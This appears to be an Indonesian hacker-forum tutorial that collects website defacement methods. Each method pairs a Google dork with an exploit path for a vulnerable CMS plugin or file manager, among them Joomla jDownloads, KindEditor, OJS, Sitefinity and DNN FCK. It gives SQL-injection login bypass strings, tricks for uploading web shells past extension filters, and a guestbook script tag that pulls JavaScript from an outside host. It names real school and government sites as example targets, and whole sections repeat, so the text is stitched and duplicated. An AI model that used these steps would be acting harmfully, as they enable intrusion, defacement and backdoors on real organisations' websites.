Metode(POC) deface
1.Dork Google
Inurl:index.php?option=com_collector
2.Paste tulisan diatas pada pencarian Google
3.Pilih salah satu target
Salah dua juga gpp hehe
4.Sudah menemukan blm gan? Contoh
http://www.target.go.id/index.php bla bla bla
5.Kemudian paste Exploit ini.. paste dimana? Di hati kamu ea 😂
Index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1
6.Contoh :
http://www.Targeti.go.id/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1
7.Lalu Upload Shell favorit kalian, dan Deface enjoy wkkwwk !
#(12) .Metode CMS Joomla dengan eXploit Jdownloads Shell Upload Vulnerability .
Let's Play with me Baby ;*
Dork : intext:"Powered by jDownloads"
(gunakan imajinasi vokepers lu, biar dapet yg vuln n verawan)
eXploit :
/index.php?option=com_jdownloads&Itemid=1&view=upload
atau
/index.php?option=com_jdownloads&Itemid=1&task=upload
Script Deface dengan ekstensi deface.html.j, deface.txt.j atau yang mau upload Shell silahkan siapkan shell.php.php.j
1. Dorking menggunakan Search Engine
2. pilih salah satu web yg pen ditusb0l, Lalu masukan exploitnya.
cth: target.coli/index.php?option=com_jdownloads&Itemid=1&view=upload
3. Vulnerability ~ Muncul Formulir
4. Lalu isi data2 yang perlu tunjukkan imajinasi mu guys uploads script pepes mu atau shell kalian
contoh Gua upload file mamam.php.php.j
5. Kalo sukses nanti Muncul icon +berwarna Hijau.
6. File/Shell Akses: /images/jdownloads/screenshots/filelu.php.
#(15) .metode kind ea ea
buka www.google.com
copy dork ini ==> inurl:examples/uploadbutton.html
akan muncul banyak web, pilih aja salah satu
contoh => http://redpoint.photonic.com.tw/Public/Js/kindeditor/examples/uploadbutton.html
di sana ada kolom buat file upload, upload file html yang sudah disiapkan
kemudian copy link tersebut dan pastekan dibelakang url.com
contoh => http://redpoint.photonic.com.tw/Public/Js/kindeditor/attached/file/20121112/20121112182049_93263.html
sumber:http://betuljawab.blogspot.com
#(1) .metode roxy
DORK: Intitle:"Roxy File Manager" (silahkan kembangkan sendiri)
#(2) .metode. Com.fabrik
Dork:
inurl:index.php?option=com_fabrik
inurl:index.php/component/fabrik/ site:
inurl:index.php?option=com_fabrik&view= site:
inurl:importcsv.php site:
inurl:viewTable?cid= site:com
(Selebihnya kebangin lg menggunakan imajinasi
inurl:index.php?option=com_fabrik
inurl:index.php/component/fabrik/ site:
inurl:index.php?option=com_fabrik&view= site:
inurl:importcsv.php site:
inurl:viewTable?cid= site:com
(Selebihnya kebangin lg menggunakan imajinasi
#(3) .metode bypass
nih yg masih newbie tutor cara bypass admin. mohon di pahamin.
Bahan :
1. Dork (Ada di bawah ).
2. Shell Extensi .php.pjpeg atau php.xxxjpg
3. Kopi Item + Rokok.
4. Kesabaran :) Dork :
inurl:/admin.php intext:login intext:adminsitrator
inurl:/admin/index.php intext:username
inurl :/admin/Admin.php intext:login
inurl:/administrator/login.php intext:username
site:.inurl:/login.php intext:administrator intext:login
oke, simak tutorial di bawah ya :*
1. Dorking ke google.
Misal gua pake dork:inurl:/administrator/login.php intext:admin login
2. Pilih salah satu website.
3. Isi username + pass dengan'=''or'
4. Jika vuln, maka akan masuk ke Control Panel/Admin Panel web tersebut.Jika login gagal, cari web yang lain. ( Ini guna kesabaran ) :v
5. Dan jika berhasil login, terserah kalian mau diapain:) .Bisa add/edit News atau mungkin kalo hoki nya bagus bisa upload shell :)
Bahan :
1. Dork (Ada di bawah ).
2. Shell Extensi .php.pjpeg atau php.xxxjpg
3. Kopi Item + Rokok.
4. Kesabaran :) Dork :
inurl:/admin.php intext:login intext:adminsitrator
inurl:/admin/index.php intext:username
inurl :/admin/Admin.php intext:login
inurl:/administrator/login.php intext:username
site:.inurl:/login.php intext:administrator intext:login
oke, simak tutorial di bawah ya :*
1. Dorking ke google.
Misal gua pake dork:inurl:/administrator/login.php intext:admin login
2. Pilih salah satu website.
3. Isi username + pass dengan'=''or'
4. Jika vuln, maka akan masuk ke Control Panel/Admin Panel web tersebut.Jika login gagal, cari web yang lain. ( Ini guna kesabaran ) :v
5. Dan jika berhasil login, terserah kalian mau diapain:) .Bisa add/edit News atau mungkin kalo hoki nya bagus bisa upload shell :)
#(4) .metode myflip
[-] Dork MyFlipMarket: intext:Copyright 2014 - 2014. Powered by MyFlipMarket.com
Exploit nya: /admincp/index.php
Username: ' or 1=1 limit 1 -- -+
password : ' or 1=1 limit 1 -- -+
Exploit nya: /admincp/index.php
Username: ' or 1=1 limit 1 -- -+
password : ' or 1=1 limit 1 -- -+
#(5) .metode elfinder
Komputer,EXI2T-team,Bandicam,Yt
Dork = site:uhostfull.com
EXP = http://xaitools.ml/
Exploit= /_file-manager/php/connector.php
Grets =
#Mr.EXI2T | |#Mr.BLACK-EX|MR.Y@N66A||Cyber00t || #unknown378 | #Nothing454 | #MR.SnapHeat404 ||Bla4Ck-Face|| P45_86|#P3PS0D3NT|./Mr. Zonk | MR.V3N0M | Mr.Gg | renZ | DantExpl0iter | t4mv4n_cy3b3r | CindviaDealoved | LintangLovers | NETNOT-POC | #AnonyX |
Dork = site:uhostfull.com
EXP = http://xaitools.ml/
Exploit= /_file-manager/php/connector.php
Grets =
#Mr.EXI2T | |#Mr.BLACK-EX|MR.Y@N66A||Cyber00t || #unknown378 | #Nothing454 | #MR.SnapHeat404 ||Bla4Ck-Face|| P45_86|#P3PS0D3NT|./Mr. Zonk | MR.V3N0M | Mr.Gg | renZ | DantExpl0iter | t4mv4n_cy3b3r | CindviaDealoved | LintangLovers | NETNOT-POC | #AnonyX |
#(6) .metode sitefinity
•DORK: "Sitefinity: Login"
•EXPLOIT: /sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx
-JK SUDAH DI UPLOAD SCRIPNYA KETIK INI
namasite/Files/namadeface.html
•EXPLOIT: /sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx
-JK SUDAH DI UPLOAD SCRIPNYA KETIK INI
namasite/Files/namadeface.html
#(7) .metode spawn upload
DORK = inurl:”spaw2/uploads/files/” site:th
Exploit= spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
Exploit= spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
#(8) .metode ojs
Deface OJS
Dork: inurl:/index.php/index/user/register site:ac.id
1. Search google pake dork di atas
2. Pilih salah satu web yang pengen di gebug
3. Masukan exploit nya contoh.com/files/ kalo index off berarti vuln
4. Balik ke web yang mau di gebug
5. Register centang author aja jangan yang laen
6. masuk dasboard member
7. Klik new submasion / buat naskag
8. Centang semua
9. Upload Shell extensi .phtml / .html conth.phtml / contoh.html
Akses shell conth.com/files/journals/anka random/submassions/angka random/articles/angka random pas uplot shell.phtml
Nih coba
Dork: inurl:/index.php/index/user/register site:ac.id
1. Search google pake dork di atas
2. Pilih salah satu web yang pengen di gebug
3. Masukan exploit nya contoh.com/files/ kalo index off berarti vuln
4. Balik ke web yang mau di gebug
5. Register centang author aja jangan yang laen
6. masuk dasboard member
7. Klik new submasion / buat naskag
8. Centang semua
9. Upload Shell extensi .phtml / .html conth.phtml / contoh.html
Akses shell conth.com/files/journals/anka random/submassions/angka random/articles/angka random pas uplot shell.phtml
Nih coba
#(9) .Metode Register & Upload CMS Swarakalibata
hello kali ini w (./Mr.b0n3x )
bakal ngasi tutor depes buat kalean :v *mastah minggir dlu yak ni buat newbie kya w hehe
bahan:
1. Sc depes
2. Shell backdoor (banyak ko di gugel tapi kali ini w pke punya indoxploit)
3. Dork:
intext:"PENDAFTARAN UNTUK KONTRIBUTOR ARTIKEL"
(kembangin lagi biar bnyk yg vuln and verawan)
1.dorking dlu di gugel sperti biasa
2.cari target yg menurut lu perawan dan bsa di tusbol dan masuk ke halaman register dengan cara tambahin /register.html kalo ada form pendaftaran kemungkinan bsa di tusbol(eksekusi)
3.isi aje itu form pendaftaran asal juga gpp kalo sudah klik register nanti otomatis lu bakal di anter ke halaman admin
4.upload shell lewat modul berita trus klik berita
5.trus klik tambahkan data
6.isi aja smua ngasal kecuali gambar *disitu lu upload shell kesayangan lu klo gbisa php di bypass ext jadi phtml ea
7.akses shell ke berita yg tadi lu buat klik yg warna ijo
8.nah tuh dah kliatan shell lu tinggal di klik
9.boom kalean dah masuk shell nya ea :v
Seterah dah mao ngapain semoga lu gamasuk penjara :v
Kalo mau tebas sana sini di backup dlu njing jd adminweb kaga gampang.. :v
#(10) .Metode kind editor
dork :
inurl:examples/uploadbutton.html (salin ini di search bar trz upload file deface html kalian yg belum punya edit aja punya aku ini dengan notepad)
poc : kindetor (walau sepele tpi bisa juga di mirrorkan 😉) apus txt d ujung html ya
hello kali ini w (./Mr.b0n3x )
bakal ngasi tutor depes buat kalean :v *mastah minggir dlu yak ni buat newbie kya w hehe
bahan:
1. Sc depes
2. Shell backdoor (banyak ko di gugel tapi kali ini w pke punya indoxploit)
3. Dork:
intext:"PENDAFTARAN UNTUK KONTRIBUTOR ARTIKEL"
(kembangin lagi biar bnyk yg vuln and verawan)
1.dorking dlu di gugel sperti biasa
2.cari target yg menurut lu perawan dan bsa di tusbol dan masuk ke halaman register dengan cara tambahin /register.html kalo ada form pendaftaran kemungkinan bsa di tusbol(eksekusi)
3.isi aje itu form pendaftaran asal juga gpp kalo sudah klik register nanti otomatis lu bakal di anter ke halaman admin
4.upload shell lewat modul berita trus klik berita
5.trus klik tambahkan data
6.isi aja smua ngasal kecuali gambar *disitu lu upload shell kesayangan lu klo gbisa php di bypass ext jadi phtml ea
7.akses shell ke berita yg tadi lu buat klik yg warna ijo
8.nah tuh dah kliatan shell lu tinggal di klik
9.boom kalean dah masuk shell nya ea :v
Seterah dah mao ngapain semoga lu gamasuk penjara :v
Kalo mau tebas sana sini di backup dlu njing jd adminweb kaga gampang.. :v
#(10) .Metode kind editor
dork :
inurl:examples/uploadbutton.html (salin ini di search bar trz upload file deface html kalian yg belum punya edit aja punya aku ini dengan notepad)
poc : kindetor (walau sepele tpi bisa juga di mirrorkan 😉) apus txt d ujung html ya
#(11). .Metode Com colector
1.Dork Google
Inurl:index.php?option=com_collector
2.Paste tulisan diatas pada pencarian Google
3.Pilih salah satu target
Salah dua juga gpp hehe
4.Sudah menemukan blm gan? Contoh
http://www.target.go.id/index.php bla bla bla
5.Kemudian paste Exploit ini.. paste dimana? Di hati kamu ea 😂
Index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1
6.Contoh :
http://www.Targeti.go.id/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1
7.Lalu Upload Shell favorit kalian, dan Deface enjoy wkkwwk !
#(12) .Metode CMS Joomla dengan eXploit Jdownloads Shell Upload Vulnerability .
Let's Play with me Baby ;*
Dork : intext:"Powered by jDownloads"
(gunakan imajinasi vokepers lu, biar dapet yg vuln n verawan)
eXploit :
/index.php?option=com_jdownloads&Itemid=1&view=upload
atau
/index.php?option=com_jdownloads&Itemid=1&task=upload
Script Deface dengan ekstensi deface.html.j, deface.txt.j atau yang mau upload Shell silahkan siapkan shell.php.php.j
1. Dorking menggunakan Search Engine
2. pilih salah satu web yg pen ditusb0l, Lalu masukan exploitnya.
cth: target.coli/index.php?option=com_jdownloads&Itemid=1&view=upload
3. Vulnerability ~ Muncul Formulir
4. Lalu isi data2 yang perlu tunjukkan imajinasi mu guys uploads script pepes mu atau shell kalian
contoh Gua upload file mamam.php.php.j
5. Kalo sukses nanti Muncul icon +berwarna Hijau.
6. File/Shell Akses: /images/jdownloads/screenshots/filelu.php.
#(13) .Metode jso bukatamu
1.Dork : "Inurl:/Bukutamu.html site:.th"
Kembangkan otak vokepers mu nak
2.Script JSO Nih"
<script type="text/javascript" src="http://atominik.com/T37"></script>"
Tinggal Edit
3.Bawa Enjoy Biar Otak FRESH bebz :D
Step by Step nya nh bebz jngn shafao mulu lu simak:
1.Dork : "Inurl:/Bukutamu.html" ,
Contoh target
Target : http://www.smktarunabangsa.sch.id/bukutamu.html
2.Isi Kolom :Name = Isi bebas,
Email = Isi bebas,
Pesan Anda = Masukkan
Script JSO:
Masukkan Kode Vertifikasi
Klo vuln akan muncul script kalian tadi,
Tapi klo tidak vuln.. kurang tamvan berarti
1.Dork : "Inurl:/Bukutamu.html site:.th"
Kembangkan otak vokepers mu nak
2.Script JSO Nih"
<script type="text/javascript" src="http://atominik.com/T37"></script>"
Tinggal Edit
3.Bawa Enjoy Biar Otak FRESH bebz :D
Step by Step nya nh bebz jngn shafao mulu lu simak:
1.Dork : "Inurl:/Bukutamu.html" ,
Contoh target
Target : http://www.smktarunabangsa.sch.id/bukutamu.html
2.Isi Kolom :Name = Isi bebas,
Email = Isi bebas,
Pesan Anda = Masukkan
Script JSO:
Masukkan Kode Vertifikasi
Klo vuln akan muncul script kalian tadi,
Tapi klo tidak vuln.. kurang tamvan berarti
#(14) .Metode fck ea ea
[+] DORK : inurl:tabid/176/Default.aspx
inurl:portals/0/
inurl:Fck/fcklinkgallery.aspx
[+] EXPLOIT :www.target.mu/[path]/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
[+] CODE :
Javascript:__doPostBack('ctlURL$cmdUpload','')
[+] Access File :www.TARGET.mu/[path]/portals/0/Cakil.txt
[+] Support file :*. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc,*.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.wrf [+] POC :
1. Dorking di gugel. Bukan di shafao oke :v wkkwkwk vis beb
2. Insert Exploit ,Klik Opsi Link Type : File, dan pilih Opsi File Location : Root
3. Ganti URL nya menjadi kode
javascript:__doPostBack('ctlURL$cmdUpload','')
4. Maka akan muncul form upload ea dan langsung aja klik tombol Browse
dan unggah file lu ya ;)
5. Nah jika sudah di unggah lalu access file lu bebz ,
inurl:portals/0/
inurl:Fck/fcklinkgallery.aspx
[+] EXPLOIT :www.target.mu/[path]/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
[+] CODE :
Javascript:__doPostBack('ctlURL$cmdUpload','')
[+] Access File :www.TARGET.mu/[path]/portals/0/Cakil.txt
[+] Support file :*. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc,*.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.wrf [+] POC :
1. Dorking di gugel. Bukan di shafao oke :v wkkwkwk vis beb
2. Insert Exploit ,Klik Opsi Link Type : File, dan pilih Opsi File Location : Root
3. Ganti URL nya menjadi kode
javascript:__doPostBack('ctlURL$cmdUpload','')
4. Maka akan muncul form upload ea dan langsung aja klik tombol Browse
dan unggah file lu ya ;)
5. Nah jika sudah di unggah lalu access file lu bebz ,
#(15) .metode kind ea ea
buka www.google.com
copy dork ini ==> inurl:examples/uploadbutton.html
akan muncul banyak web, pilih aja salah satu
contoh => http://redpoint.photonic.com.tw/Public/Js/kindeditor/examples/uploadbutton.html
di sana ada kolom buat file upload, upload file html yang sudah disiapkan
kemudian copy link tersebut dan pastekan dibelakang url.com
contoh => http://redpoint.photonic.com.tw/Public/Js/kindeditor/attached/file/20121112/20121112182049_93263.html